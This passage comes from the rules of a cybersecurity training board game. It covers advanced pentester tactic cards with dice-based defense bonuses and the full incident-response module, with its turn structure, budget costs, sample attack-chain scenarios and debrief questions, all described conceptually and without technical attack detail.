Special Rule - Immutable Backup Check: If Blue Team deployed D-19, they also need verification that backups are immutable and tested. If backup testing procedures weren't mentioned in D-19 deployment, the bonus only applies if they roll 15+.
Teaching Point: Ransomware is now the #1 cybersecurity threat. Prevention through detection is important, but backup resilience is the ultimate defense. Immutable backups that survive ransomware attacks are essential business continuity strategy. Regular restore testing is critical.
Tactic Type: Advanced Persistent Threat / Long-term Compromise Target Vectors: CREDENTIAL_ABUSE, MALWARE, NETWORK, DATA_EXFIL Difficulty: EXPERT+ (defeat DC 16)
Description: A pentester simulates an Advanced Persistent Threat (APT) campaign that maintains presence across multiple turns. Each turn, the APT performs new reconnaissance, persistence, lateral movement, or data exfiltration activities. The Blue Team must detect and eradicate the APT before it achieves critical objectives. This is a multi-turn challenge that escalates difficulty.
Attack Details: - Multi-turn challenge (lasts 2-3 turns of main game) - Targets: Long-term detection, threat hunting, incident response procedures - Each turn the APT performs an action; Blue Team must detect and respond - If APT achieves 3 objectives (e.g., 3 successful data exfils), game is lost
Turn-by-Turn APT Actions: - Turn 1: Reconnaissance (scan network, enumerate users, identify critical assets) - Turn 2: Lateral movement (move to file server, domain controller) - Turn 3: Persistence establishment (add backdoor, create hidden user account) - Turn 4 (if still active): Data exfiltration (steal customer database) - Turn 5+ (if still active): Destruction phase (delete logs, trigger ransomware)
Defending Against APT:
Each turn, Blue Team must roll 1d20 to detect the APT activity:
D-24 (Threat Intelligence): +2 bonus (known APT indicators in threat feeds)
Eradication Phase (if detected):
Outcome: - Blue Team Succeeds (roll ≥ current DC, base 16): APT detected and eradicated before achieving 3 objectives - Blue Team Fails (roll < current DC): APT progresses to next action; if 3 objectives achieved, game is lost
Special Rule - Escalating Difficulty: Each turn the APT remains undetected, DC increases by 1 (Turn 1: DC 16, Turn 2: DC 17, Turn 3: DC 18, etc.)
Teaching Point: APTs are sophisticated, well-resourced, and patient. They expect to remain undetected for months or years. Early detection is critical. Continuous monitoring, threat intelligence integration, and advanced hunting are essential for APT detection.
Tactic Type: Cloud Security / Privilege Escalation Target Vectors: MALWARE, CREDENTIAL_ABUSE, NETWORK, DATA_EXFIL Difficulty: ADVANCED (defeat DC 14)
Description: A pentester discovers misconfigured cloud resources (S3 bucket, Azure storage, GCP database) that are accessible without authentication. They pivot from compromised workstation to cloud infrastructure, exfiltrating sensitive data stored in cloud. Can your cloud security controls catch this lateral movement into cloud?
Attack Details: - Targets: Cloud security posture management, identity & access management in cloud - Assumes: Blue Team has cloud infrastructure in their network design - Success indicates: Misconfigured cloud resources, weak cloud IAM policies - Blue Team rolls 1d20 to detect and remediate
Defending Defenses: - D-04 (Firewall Rules): +1 bonus (limits cloud connectivity from compromised systems) - D-20 (Zero Trust Access): +2 bonus (requires proper identity & authorization for cloud access) - D-21 (Container Security): +2 bonus (blocks cloud API abuse if containerized) - D-22 (SIEM Enterprise): +2 bonus (detects unusual cloud API calls) - D-24 (Threat Intelligence): +1 bonus (known misconfigured bucket signatures) - New Special Defense - Cloud Posture Mgmt: +3 bonus (automatically detects and remediates misconfigurations)
Special Cloud Defense: If Blue Team deployed cloud-specific hardening (e.g., cloud security posture management tools, cloud-native IAM), add +2 bonus.
Outcome: - Blue Team Succeeds (14+): Misconfiguration detected and remediated before exfiltration - Blue Team Fails: Cloud data is exfiltrated; -1 penalty to all rolls for remainder of game, plus immediate 15 Budget cost for cloud forensics
Teaching Point: Cloud security is fundamentally different from on-premises. Shared responsibility model requires organizations to actively manage cloud configuration. Cloud misconfigurations are the #1 cloud vulnerability. Continuous posture scanning is essential.
Tactic Type: Operational Technology Attack / Physical Safety Impact Target Vectors: NETWORK, MALWARE Difficulty: ADVANCED (defeat DC 14)
Description: A pentester compromises IoT or Operational Technology (OT) devices (industrial control systems, HVAC, building management, manufacturing systems) that are connected to the corporate network. Unlike IT systems (computers, servers), OT systems prioritize availability and cannot be patched frequently. Can your network architecture prevent OT compromise, and can you detect it before physical systems are affected?
Attack Details: - Targets: Network segmentation between IT and OT, OT-specific monitoring - Assumes: Blue Team has IoT/OT devices in their network design - Success indicates: Lack of network segmentation or OT-specific monitoring - Blue Team rolls 1d20 to detect and isolate
Defending Defenses: - D-04 (Firewall Rules): +1 bonus (separates IT from OT traffic) - D-09 (Network Segmentation): +3 bonus (dedicated OT segment with restricted access) - D-10 (SIEM Correlation): +1 bonus (detects OT anomalies if properly tuned) - D-22 (SIEM Enterprise): +2 bonus (advanced OT monitoring and correlation) - New Special Defense - OT Monitoring: +3 bonus (specialized tools detect OT compromise)
Special OT Defense: If Blue Team has deployed OT-specific monitoring and segmentation, add +2 bonus.
Outcome: - Blue Team Succeeds (14+): OT compromise detected and isolated before impact - Blue Team Fails: OT systems compromised; physical operations affected, -2 penalty to all rolls for remainder of game, plus potential safety/liability consequences (narrative impact)
Teaching Point: OT security is distinct from IT security. OT systems cannot be patched like IT systems. Network segmentation is the primary defense. OT-specific monitoring and threat hunting are essential. Organizations with manufacturing, utilities, or building management need specialized OT security strategies.
Tactic Type: Persistence / Hardware-Level Attack Target Vectors: MALWARE, NETWORK Difficulty: EXPERT (defeat DC 15)
Description: A pentester with physical or remote access targets system firmware (BIOS/UEFI) or bootloader, establishing persistence at the hardware level below the operating system. This attack survives OS reinstalls and even hardware replacement (if firmware is deployed via supply chain). Can your controls detect and prevent firmware-level attacks?
Attack Details: - Targets: Firmware integrity, secure boot verification, hardware attestation - Success indicates: Lack of UEFI Secure Boot, no firmware validation, no TPM - Blue Team rolls 1d20 to detect firmware tampering
Defending Defenses: - D-16 (Credential Guard & Secure Boot): +3 bonus (UEFI Secure Boot prevents unauthorized firmware) - D-17 (Malware Sandbox): +1 bonus only (doesn't catch firmware-level attacks) - D-13 (Threat Hunting): +2 bonus (advanced hunting detects firmware persistence) - New Special Defense - Hardware Attestation: +3 bonus (TPM verification detects firmware changes) - New Special Defense - Supply Chain Verification: +2 bonus (validates firmware integrity from trusted source)
Special Firmware Defense: If Blue Team deployed secure boot, TPM attestation, and hardware validation, add +2 additional bonus.
Outcome: - Blue Team Succeeds (15+): Firmware tampering detected and system reimaged - Blue Team Fails: Firmware-level persistence established; -2 penalty to all rolls for remainder of game, Blue Team loses control of compromised system
Teaching Point: Firmware attacks are extremely sophisticated but increasingly common in APT campaigns. Secure Boot and TPM are standard defenses but must be enabled and properly configured. Firmware supply chain security is critical. Organizations should consider firmware integrity verification in procurement.
Tactic Type: Privilege Escalation / Container Escape Target Vectors: MALWARE, NETWORK Difficulty: EXPERT (defeat DC 15)
Description: A pentester, operating from within a compromised container, exploits a container runtime vulnerability (like CVE-2019-5736 runc exploit) to escape the container and gain access to the underlying host system. From there, lateral movement to other containers and host systems becomes possible. Can your container security and patching strategies prevent container escape?
Attack Details: - Targets: Container runtime patching, container isolation, runtime security - Assumes: Blue Team has containerized workloads (Docker, Kubernetes, etc.) - Success indicates: Unpatched container runtime or lack of runtime monitoring - Blue Team rolls 1d20 to prevent or detect escape
Defending Defenses: - D-03 (Patching): +2 bonus (ensures container runtime is patched) - D-08 (EDR): +2 bonus (detects suspicious syscalls attempting escape) - D-13 (Threat Hunting): +2 bonus (hunting for container escape indicators) - D-21 (Container Security): +4 bonus (runtime security detects and blocks escape attempts) - New Special Defense - Kubernetes Security Policies: +2 bonus (network policies and pod security policies restrict escape)
Special Container Defense: If Blue Team has deployed comprehensive container security (runtime monitoring + pod security policies + network policies), add +2 additional bonus.
Outcome: - Blue Team Succeeds (15+): Container escape prevented or detected before host compromise - Blue Team Fails: Attacker escapes container to host; immediate +1 for all subsequent attacks, gains ability to compromise other containers
Teaching Point: Container security is distinct from traditional OS security. Container runtimes have historically had significant vulnerabilities. Runtime security monitoring is essential. Kubernetes network policies and pod security standards are critical controls. Organizations using containers must keep runtimes patched and actively monitor for escape attempts.
| Card | Tactic | Vectors | Difficulty | Primary Defense |
|---|---|---|---|---|
| PT-09 | Multi-Vector Attack | Multiple | ADVANCED (DC 14) | Integrated Response |
| PT-10 | Zero-Day Exploitation | MALWARE, WEB | EXPERT (DC 15) | Behavioral Detection |
| PT-11 | Ransomware Deployment | MALWARE, EXFIL, NETWORK | EXPERT (DC 15) | Backup & DR |
| PT-12 | APT Campaign | Multiple | EXPERT+ (DC 16) | Threat Hunting |
| PT-13 | Cloud Misconfiguration | Multiple | ADVANCED (DC 14) | Cloud Posture |
| PT-14 | IoT/OT Compromise | NETWORK, MALWARE | ADVANCED (DC 14) | OT Segmentation |
| PT-15 | Firmware Attack | MALWARE, NETWORK | EXPERT (DC 15) | Hardware Attestation |
| PT-16 | Container Escape | MALWARE, NETWORK | EXPERT (DC 15) | Runtime Security |
Scenario A: Cloud-Native Hardening (6 turns) - Turn 1-3: Deploy cloud-specific defenses + container security - Turn 4: PT-13 (Cloud Misconfiguration) challenge - Turn 5: PT-16 (Container Escape) challenge - Turn 6: Final defense evaluation
Scenario B: APT Defense (8 turns) - Turns 1-4: Deploy enterprise-grade defenses (SIEM, threat hunting, forensics) - Turns 5-7: PT-12 (APT Campaign) multi-turn challenge - Turn 8: Eradication and recovery
Scenario C: Zero-Day & Ransomware (7 turns) - Turns 1-3: Deploy behavioral detection + backup systems - Turn 4: PT-10 (Zero-Day) challenge - Turn 5: PT-11 (Ransomware) challenge - Turns 6-7: Recovery and hardening improvements
Each Advanced Tactic represents modern, sophisticated threat scenarios that:
Advanced tactics can be introduced gradually: - Start with PT-09 (Multi-Vector) and PT-10 (Zero-Day) - Once mastered, add PT-11 (Ransomware) and PT-13 (Cloud) - Save PT-12 (APT), PT-14 (OT), PT-15 (Firmware), PT-16 (Container) for expert play
Advanced tactics build on concepts from core tactics: - PT-09 (Multi-Vector) combines concepts from PT-01 to PT-08 - PT-10 (Zero-Day) extends PT-05 (Priv Esc) concepts - PT-12 (APT) extends PT-02 (Malware Evasion) concepts
Possible additional advanced tactics: - PT-17: Machine Learning Model Poisoning - PT-18: Quantum-Resistant Cryptography Breaking - PT-19: Supply Chain Compromise (Deep Dive) - PT-20: Geopolitical Nation-State Attack Simulation
Hardening Module: Advanced Pentester Tactics Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition
docs/rules/module-incident-response.md
Version: 2.2 - Playtest Edition Last Updated: July 2026
The Incident Response Module is the foundation of Incident Zero. Players act as a security operations center (SOC) team responding to an active cyberattack. The core challenge: reveal a hidden attack chain before time runs out or budget is exhausted.
This module teaches: - Primary: Cyber kill chain understanding, threat detection, evidence gathering - Secondary: Resource prioritization, incident response under pressure, forensic investigation
Key Mechanics: - Hidden attack chain (3-5 Threat Cards) is pre-built by the Threat Orchestrator - Blue Team reveals cards by successful investigation (two successes on the same chain link, v2.2) or by deploying a vector+step-matching defense - Uncontained Threats Penalty creates urgency—revealed threats cost 5 Budget per turn until contained - Active Breach Cost (v2.2)—while any chain card remains hidden, the breach itself costs 5 Budget per turn (dwell time is never free) - Emergency Response action provides a way to contain uncontained threats (15 Budget, v2.2)
Turn limits use the Variable Game Length formula from Core Rules §3a: Turn Limit = (Attack Chain Cards × 2) + 1.
| Difficulty | Chain Length | Starting Budget | Turn Limit | Best For |
|---|---|---|---|---|
| Beginner | 3 cards | 100 | 7 turns | First playthrough, basic learning |
| Intermediate | 4 cards | 100 | 9 turns | Standard play, mixed experience |
| Advanced | 5 cards | 100 | 11 turns | Experienced players, challenge |
Scaling Notes: - Beginner: ~30 min session, teaches full kill chain with comfortable pace - Intermediate: ~40 min session, requires focused investigation strategy - Advanced: ~45 min session, demands efficient resource allocation and quick thinking - Advanced Threat Orchestrators can instead use the Tier + d4 system in Core Rules §3a
Create the Hidden Attack Chain:
1. Select 3-5 Threat Cards from the deck
2. Arrange them in logical attack chain sequence:
- First card: INITIAL COMPROMISE
- Middle cards: PIVOT & ESCALATE, PERSISTENCE
- Final card: C2 & EXFIL
3. Write down clues for each hidden card on separate paper (keep hidden from Blue Team)
4. Place relevant Asset Cards on the table (visible to all—provides scenario context). Asset Cards are shared components: see cards/network-building/core-deck/asset-cards.md
Attack Chain Strategy Tips: - Start simple (Beginner): Phishing → Lateral Movement → Database Exfil - Intermediate: Phishing → Credential Dumping → VPN Access → Persistence → C2 Beaconing - Advanced: Web Exploit → Lateral Movement → Privilege Escalation → Data Staging → Exfiltration
Recommended First-Time Scenario (3 cards, 30 minutes): 1. T-01: Phishing Campaign (INITIAL COMPROMISE - SOCIAL ENGINEERING) 2. T-04: Lateral Movement via SMB (PIVOT & ESCALATE - NETWORK) 3. T-10: SQL Database Exfiltration (C2 & EXFIL - DATA EXFIL)
Initialize trackers and materials:
| Item | Starting Value |
|---|---|
| Turn Tracker | 1 |
| Budget Tracker | 100 |
| Uncontained Threats Tracker | 0 |
| Defense Cards | Draw 5 (face down) |
Threat Orchestrator delivers opening narrative using only the first hidden card's clue. Example:
"Your security operations center is monitoring the network when alerts begin firing. Your SIEM shows suspicious email traffic coming from your IT department domain, but the headers look spoofed. Several employees have reported clicking links in emails they thought came from IT requesting password resets.
You have limited time and budget to investigate before the attacker escalates. What do you do?"
Each turn represents approximately 2-4 hours of incident response operations.
COMPLETE TURN SEQUENCE:
1. START OF TURN - Apply Uncontained Threats Penalty: For each revealed-but-uncontained threat, deduct 5 Budget from the tracker - Apply Active Breach Cost (v2.2): If at least one chain card is still unrevealed, deduct 5 Budget (the hidden breach is doing damage while you can't see it) - Announce current turn number and budget remaining - Example: "Turn 3. Start-of-turn costs: 5 for your uncontained threat, plus 5 Active Breach Cost—the chain isn't fully mapped yet. Budget drops from 85 to 75."
2. BLUE TEAM'S TURN (2-3 minutes discussion) - Team discusses incident response strategy - Decides on ONE action to take this turn (Investigate, Deploy Defense, or Emergency Response) - Team member announces action and parameters (what they're investigating, which defense they're deploying, etc.)
3. ACTION RESOLUTION - Perform chosen action (see three actions below) - Roll 1d20 if action requires a roll - Apply modifiers (see modifier rules in core-rules.md) - Resolve outcome immediately
4. END OF TURN - Advance Turn Tracker by 1 - Draw 1 new Defense Card (add to hand) - Check if game has been won or lost (see victory/defeat conditions below) - If still playing, return to START OF TURN
The attack chain is discovered in order: only the earliest unrevealed chain card can be investigated toward or revealed. Clues, investigation successes, and Deploy Defense reveals all target that card until it is face-up, then attention shifts to the next link. This matches how the clue system walks the kill chain.
Deployed defenses stay on the table and keep working. Whenever the chain link currently being targeted has an Attack Vector matching a deployed defense's Countermeasure Vector, add +2 to Investigate and Deploy Defense rolls against that link. The Threat Orchestrator (who knows the hidden vector) announces when this bonus applies—hearing "your deployed defenses are helping here" is itself a useful clue. This rule is stated once here; other sections simply refer to it.
Cost: 5 Budget per action Roll Required: roll + modifiers ≥ 11 on d20 Special Rule: Modifiers apply and can stack
How It Works:
Roll Modifiers:
| Bonus | When Awarded | Examples |
|---|---|---|
| +2 | Strong technical justification | "We're analyzing email headers in the mail gateway logs to identify the true sender IP and check it against threat intelligence feeds. This helps us understand the initial compromise vector." |
| +1 | Real security tools/techniques referenced | "We'll query our SIEM for scheduled task creation events" or "We're checking for Mimikatz usage in memory" |
| +2 | Deployed Defense Persistence (v2.2) | A deployed defense's vector matches the targeted chain link (see rule above) |
| +0 | Vague investigation | "We want to find suspicious activity" |
Success (roll + modifiers ≥ 11) — Investigation successes accumulate (v2.2): - First success against a chain link: TO provides a verbal clue about that card (the earliest unrevealed card in the chain) - Second success against the same chain link: THE CARD IS REVEALED! Place it face-up; it becomes uncontained (add 1 to the Uncontained Threats Tracker) and the team chooses a Discovery Reward - Clues should be dramatic and progressive—give more detail with each successful investigation - Budget is spent (5 is deducted)
Failure (roll + modifiers < 11): - "Your investigation yields no actionable intelligence at this time" - Budget is spent anyway (5 is deducted) - Team learns nothing but advances in time - Failure is realistic—not every investigation uncovers information - Failures do NOT count toward the two accumulated successes
Strategic Consideration: - Cheap action (only 5 Budget) - Moderate success chance (need 11+ on d20, so ~50% without bonuses) - Two successful investigations reveal a card without needing the right Defense Card in hand (v2.2) - Deploy Defense (full match) is faster—one successful roll—but costs more and needs the right card
Cost: 10/15/25 Budget (depending on Defense Card tier: BASIC/ADVANCED/ELITE) Roll Required: roll + modifiers ≥ 11 on d20 Special Rule: Modifiers apply; matching defense to threat reveals cards immediately
How It Works:
Roll Modifiers: Same as Investigate action (+2 for justification, +1 for tools, +2 Deployed Defense Persistence if applicable)
Success (roll + modifiers ≥ 11):
Check if Defense Card matches the earliest unrevealed hidden threat (sequential discovery): - FULL MATCH: Defense Countermeasure Vector matches threat's Attack Vector AND it's the correct step in the chain - THREAT CARD IS REVEALED IMMEDIATELY! Threat card is placed face-up on the table. Blue Team learns what they've been fighting. - Threat card is now "uncontained" (add 1 to Uncontained Threats Tracker) - Defense Card is discarded (used) - Budget is spent
Defense remains active—see Deployed Defense Persistence (v2.2): it grants +2 to future rolls against any chain link matching its vector
NO MATCH: Defense doesn't address current threat
Failure (roll + modifiers < 11): - Defense fails to deploy properly - Budget is spent anyway - Card is discarded - No progress made, but team learns from failure
Key Point: Even "unsuccessful" Defense deployments can be strategically valuable. Deployed defenses stay in play and grant +2 to rolls against later threats that match their vector (v2.2).
Strategic Consideration: - Expensive action (10-25 Budget, scales with defense tier) - Moderate success chance (same 11+ threshold as Investigate) - Two potential rewards: Defense deployment AND card reveal - High-risk/high-reward compared to Investigate
Example Scenario:
Hidden attack chain: Phishing → Lateral Movement → Database Exfil
Team believes phishing is happening (first card).
They deploy D-01 "Email Authentication Setup" (BASIC, 10 Budget).
Email Authentication addresses SOCIAL ENGINEERING vector.
Roll: 8 + 2 (strong justification) = 10 = FAIL
Email deployment fails, 10 Budget spent, card discarded.
Next turn: Same team deploys D-02 "User Security Training" (BASIC, 10 Budget).
Roll: 13 + 1 = 14 = SUCCESS
Defense addresses SOCIAL ENGINEERING vector and is INITIAL COMPROMISE step.
PHISHING CAMPAIGN REVEALED! Threat card placed face-up.
Uncontained Threats increases to 1 (now costing 5 Budget per turn).
Cost: 15 Budget (v2.2 — repriced from 25; flat cost) Roll Required: None—this always succeeds Special Rule: Only works on previously revealed threats
How It Works:
Strategic Use Cases:
Example Timeline (one action per turn):
Turn 3: Deploy Defense succeeds → PHISHING revealed → Uncontained Threats = 1
Turn 4: START → Deduct 5 (uncontained) + 5 (Active Breach Cost, 2 cards still hidden)
ACTION → Emergency Response on Phishing: pay 15 Budget
→ Phishing removed from play, Uncontained Threats = 0
Turn 5: START → Deduct only 5 (Active Breach Cost; no uncontained threats)
These are the core urgency mechanics of Incident Response. Dwell time costs money—whether you can see the threat or not.
Step 1: Threat Revealed - When a Threat Card is successfully revealed (by two investigation successes or a full-match defense deployment) - Add 1 to the Uncontained Threats Tracker - This threat is now "active" and dangerous
Step 2: Penalty Applied at Turn Start - At the START of every turn, deduct 5 Budget per uncontained threat - Example: 2 uncontained threats = 10 Budget penalty each turn - This creates continuous pressure—you MUST contain threats or lose resources
Step 3: Auto-Mitigation - When the next card in the attack chain is revealed, the previous uncontained threat is automatically "contained" (represents shift of attention to new priority) - Uncontained Threats Tracker decreases by 1 - Penalties decrease immediately
Step 4: Emergency Response Containment - Team can use Emergency Response action to immediately remove a threat from the board - Cost: 15 Budget (v2.2) - Uncontained Threats Tracker decreases by 1
SETUP: 3-card chain (Phishing → Lateral Movement → Database Exfil)
Budget 100, Turn Limit 7 [(3 × 2) + 1]
Turn 1: START → Active Breach Cost -5 (95). No uncontained threats.
INVESTIGATE email headers (-5, 90). Roll succeeds.
→ 1st success vs. link 1: clue about the phishing campaign.
Turn 2: START → Active Breach Cost -5 (85).
INVESTIGATE mail gateway logs (-5, 80). Roll succeeds.
→ 2nd success vs. link 1: ✓ PHISHING CAMPAIGN REVEALED (investigation reveal, v2.2)
Uncontained Threats = 1. Reward: Budget Grant +10 (90).
Turn 3: START → -5 (uncontained) -5 (Active Breach) = 80.
INVESTIGATE network logs (-5, 75). Roll succeeds.
→ 1st success vs. link 2: clue about SMB lateral movement.
Turn 4: START → -5 (uncontained) -5 (Active Breach) = 65.
DEPLOY D-09 Network Segmentation (ADVANCED, -15, 50). Roll succeeds.
FULL MATCH (NETWORK vector, PIVOT & ESCALATE step)
→ ✓ LATERAL MOVEMENT REVEALED immediately (deploy reveal)
Phishing auto-mitigates; Lateral Movement now uncontained (still 1 total).
Reward: Budget Grant +10 (60).
Turn 5: START → -10 (50).
INVESTIGATE database access logs (-5, 45). Roll fails. No progress.
Turn 6: START → -10 (35).
INVESTIGATE DLP alerts (-5, 30). Roll succeeds.
→ 1st success vs. link 3: clue about bulk data leaving the database.
Turn 7: START → -10 (20).
DEPLOY D-11 Data Loss Prevention (ADVANCED, -15, 5). Roll succeeds.
FULL MATCH (DATA EXFIL vector, C2 & EXFIL step)
→ ✓ DATABASE EXFILTRATION REVEALED — final card!
Victory is checked IMMEDIATELY (before any start-of-turn penalties).
WIN on the final turn with 5 Budget remaining.
(Arithmetic check, turn by turn: 100 → 95 → 90 | 85 → 80 → +10 = 90 | 80 → 75 | 65 → 50 → +10 = 60 | 50 → 45 | 35 → 30 | 20 → 5.)
Blue Team wins Incident Response if: 1. ALL threat cards in the attack chain are revealed (face-up on table), AND 2. This happens within the turn limit (7/9/11 by chain length, per Core Rules §3a)
Victory is checked immediately when the final card is revealed (v2.2) — before any start-of-turn penalties would apply. Revealing the last card on your final turn with 0 Budget remaining is still a win.
Blue Team loses Incident Response if: 1. Turn Tracker exceeds the turn limit with unrevealed cards remaining, OR 2. The team cannot take any legal action (see Budget Edge Rules below)
Losing Scenarios: - Turns expired with only 2 of 4 cards revealed = attack succeeded - Budget too low to afford any action = response ran out of resources
If you want to measure quality of victory:
Victory Points Formula:
Points = (Cards Revealed / Total Cards) × 50 + (Budget Remaining / Starting Budget) × 50
Examples:
- 4 of 4 cards revealed, 35 Budget remaining: (4/4 × 50) + (35/100 × 50) = 50 + 17.5 = 67.5/100 (Victory with good efficiency)
- 3 of 4 cards revealed, 15 Budget remaining: (3/4 × 50) + (15/100 × 50) = 37.5 + 7.5 = 45/100 (Partial victory, struggled)
- 2 of 4 cards revealed, 0 Budget: (2/4 × 50) + (0 × 50) = 25/100 (Defeat)
When your team successfully reveals a Threat Card, immediately choose ONE of these rewards:
Important: Choose only ONE reward per card reveal. Cannot combine rewards.
Every game should conclude with guided reflection connecting game mechanics to real security concepts.
Discuss whether they targeted the right logs/evidence first
"Which action type was most effective for you—Investigate or Deploy Defense?"
Both are valid; discuss trade-offs (v2.2: investigation reveals need two successes but cost less)
"How did the Uncontained Threats penalty and Active Breach Cost affect your decisions?"
Were they realistic representations of incident response and dwell-time costs?
"If you replayed, what would you do differently?"
Discuss investigation approaches that didn't work
"Would you have benefited from more defense deployments vs. investigations?"
Discuss risk/reward trade-offs
"How would you investigate differently if you could replay?"
Strategic adjustments for next attempt
"What was the attacker's complete kill chain?"
Discuss which card took longest to detect and why
"Why isn't this easy to detect in real-world networks?"
Detection requires specific telemetry (EDR, SIEM, network monitoring)
"What tool or process would have helped you detect faster?"
User and Entity Behavior Analytics (UEBA)
"How does game dwell time compare to real breaches?"
Poor clue (too vague, gives nothing away): - "You find something suspicious" - "There's a threat somewhere"
Bad clue (gives it away completely): - "The attacker used Mimikatz to dump credentials from LSASS memory" - "You have a database exfiltration happening right now"
Good clue (progressive disclosure, dramatic delivery): - "Your memory forensics shows suspicious LSASS process manipulation. A tool has dumped credential hashes from memory. Several cached domain admin credentials have been extracted."
Excellent clue (specific without revealing, creates narrative): - "Your EDR shows PowerShell activity with suspicious encoding. Memory access patterns suggest credential harvesting. Your domain admin cached credentials appear to have been targeted."
The game is TOO EASY if: - Team reveals all cards in the first half of the turn limit with 60+ Budget remaining - Multiple consecutive successful rolls (unlikely with d20) - Clues are too specific/obvious - Team makes no difficult decisions
Action: Make clues more subtle, reduce starting budget next time, or add extra card to chain
The game is TOO HARD if: - Team gets stuck after revealing only 1 card (4+ turns with no progress) - Multiple consecutive failed rolls - Team is frustrated rather than challenged - Team is out of ideas about what to investigate
Action: Provide more explicit clues, increase starting budget, reduce chain length
Adjustment Options: - Chain Length: 3 (easier) vs. 4 (medium) vs. 5 (harder) — the turn limit scales automatically via (chain × 2) + 1 - Clue Quality: More specific/obvious (easier) vs. subtle (harder) - Starting Budget: 80 (harder) vs. 100 (medium) vs. 120 (easier) - Turn Limit: formula −1 (harder) vs. formula (medium) vs. formula +1 (easier)
If running for tournament or competitive context:
Attack Chain: 1. T-01: Phishing Campaign (INITIAL COMPROMISE - SOCIAL ENGINEERING) 2. T-06: Mimikatz Credential Dumping (PIVOT & ESCALATE - CREDENTIAL ABUSE) 3. T-10: SQL Database Exfiltration (C2 & EXFIL - DATA EXFIL)
Starting Budget: 100 Turn Limit: 7 [(3 × 2) + 1]
Narrative Setup:
"Your startup just deployed a new customer database. An employee clicked a malicious link in an email claiming to be from IT. Security monitoring detected unusual PowerShell activity after that. Now you're investigating what happened."
Focus: Teaching full kill chain detection (initial → credential harvesting → data theft) Expected Duration: 30 minutes Best For: First-time players, classroom introduction
Sample Defenses in Starting Hand: - D-01: Email Authentication Setup (BASIC, 10) - D-02: User Security Training (BASIC, 10) - D-07: Multi-Factor Authentication (ADVANCED, 15) - D-08: EDR (Endpoint Detection & Response) (ADVANCED, 15) - D-11: Data Loss Prevention (ADVANCED, 15)
Attack Chain: 1. T-02: Watering Hole Attack (INITIAL COMPROMISE - WEB EXPLOIT) 2. T-04: Lateral Movement via SMB (PIVOT & ESCALATE - NETWORK) 3. T-07: Scheduled Task Persistence (PERSISTENCE - MALWARE) 4. T-09: Beaconing to C2 Server (C2 & EXFIL - NETWORK)
Starting Budget: 100 Turn Limit: 9 [(4 × 2) + 1]
Narrative Setup:
"Your organization's industry-specific website was silently compromised last month. A sophisticated attacker injected malicious code that targeted specific visitor browsers. One of your engineers visited the site and became infected. You're detecting strange network activity but aren't sure what's happening."
Focus: Sophisticated attack with multiple detection points; requires multiple defense/investigation attempts Expected Duration: 40 minutes Best For: Experienced players, demonstrating complex kill chain
Sample Defenses: - D-18: Intrusion Prevention System (IPS) (ADVANCED, 15) - D-09: Network Segmentation (ADVANCED, 15) - D-04: Network Firewall Rules (BASIC, 10) - D-08: EDR (Endpoint Detection & Response) (ADVANCED, 15) - D-13: Threat Hunting Program (ELITE, 25) - D-14: Memory Forensics (ELITE, 25)
Attack Chain: 1. T-13: Compromised Software Vendor Update (INITIAL COMPROMISE - MALWARE) 2. T-04: Lateral Movement via SMB (PIVOT & ESCALATE - NETWORK) 3. T-05: Privilege Escalation via Kernel Exploit (PIVOT & ESCALATE - MALWARE) 4. T-09: Beaconing to C2 Server (C2 & EXFIL - NETWORK) 5. T-11: Ransomware Payload Deployment (C2 & EXFIL - MALWARE)
Starting Budget: 100 Turn Limit: 11 [(5 × 2) + 1]
Narrative Setup:
"A trusted software vendor released an update to your monitoring tools three weeks ago. Today, you're detecting ransomware-like activity across your infrastructure. You suspect the vendor update was compromised. Can you trace the attack chain before the ransomware wakes up?"
Focus: Complex supply-chain-initiated attack; requires pattern recognition; high pressure Expected Duration: 45 minutes Best For: Advanced players, demonstrating supply chain risk
Sample Defenses: - D-17: Advanced Malware Sandbox (ELITE, 25) — detonates vendor updates before deployment - D-08: EDR (Endpoint Detection & Response) (ADVANCED, 15) - D-09: Network Segmentation (ADVANCED, 15) - D-03: Windows Update Patching (BASIC, 10) — closes the kernel exploit - D-14: Memory Forensics (ELITE, 25) - D-19: Backup & Disaster Recovery (BASIC, 10) - D-11: Data Loss Prevention (ADVANCED, 15)
How to Play Solo: - Single player acts as both Blue Team AND Threat Orchestrator - Orchestrator creates attack chain before game starts - Orchestrator then "steps back" to investigate (hard mode: don't peek at hidden cards) - Requires discipline: don't use knowledge of chain to guide rolls
Best For: Individual learning, skill practice
Compress the Game: - Reduce the turn limit by 2 (e.g., a 3-card chain plays in 5 turns instead of 7) - Optional: Remove Uncontained Threats penalty and Active Breach Cost (less bookkeeping) - Budget costs stay the same - Budget starts at 120 to balance speed pressure
Best For: Experienced teams wanting high-stakes challenge
Deeper Forensics: - Add "Advanced Investigate" action (costs 15 Budget, rolls 11+) - A successful Advanced Investigate counts as TWO accumulated investigation successes (i.e., it can reveal a link in one action if you already have a clue, v2.2) - Allows for riskier but more rewarding investigation strategy
Best For: Players who want forensic investigation to feel more rewarding
Multiple Teams, Same Challenge: 1. All teams receive the same 4-card attack chain 2. All teams start with same 100 Budget, same 5 Defense Cards drawn 3. Teams play simultaneously (or in sequence) against same scenario 4. Scoring: Cards revealed + Budget remaining = final score 5. Tiebreaker: Fewest turns taken
Best For: Classroom competition, conference play, benchmarking
Option 1: Continue to Hardening Module - Excellent choice if building defenses against discovered threats - Use the attack chain you just discovered as the hardening context - Natural progression: detect the attack → now prevent it
Option 2: Continue to Audit & Compliance Module - Great for understanding how to detect this attack chain - Validates that your detection methods work - Audits your existing security controls
Option 1: Continue to Disaster Recovery Module - Appropriate: assume the attack succeeded - Manage the breach that just happened - Focus on response, stakeholder communication, recovery
Option 2: Replay with Different Strategy - Try again with different investigation/defense approach - Use what you learned to optimize for next attempt
Option 3: Study Real Breach Case Studies - Compare your experience to real breaches (Equifax, Target, SolarWinds) - Understand why real dwell times are 200+ days - Learn what signals real defenders look for
Play Again with: - Different attack chain from the card deck - Different difficulty (if you won easily or struggled) - Competitive mode against other teams - Extended variations with different mechanics
| Action | Cost | Roll Required | Success Condition | Failure Condition |
|---|---|---|---|---|
| Investigate | 5 Budget | roll + modifiers ≥ 11 | 1st success: clue; 2nd success on same link: card revealed (v2.2) | No intel gained |
| Deploy Defense | 10/15/25 | roll + modifiers ≥ 11 | Full match reveals card immediately | Defense not deployed |
| Emergency Response | 15 Budget (v2.2) | None | Threat removed, penalty stops | — |
| Bonus | When Awarded | Examples |
|---|---|---|
| +2 | Strong technical justification | "Analyze mail headers in gateway logs to identify true sender IP, check against threat intelligence" |
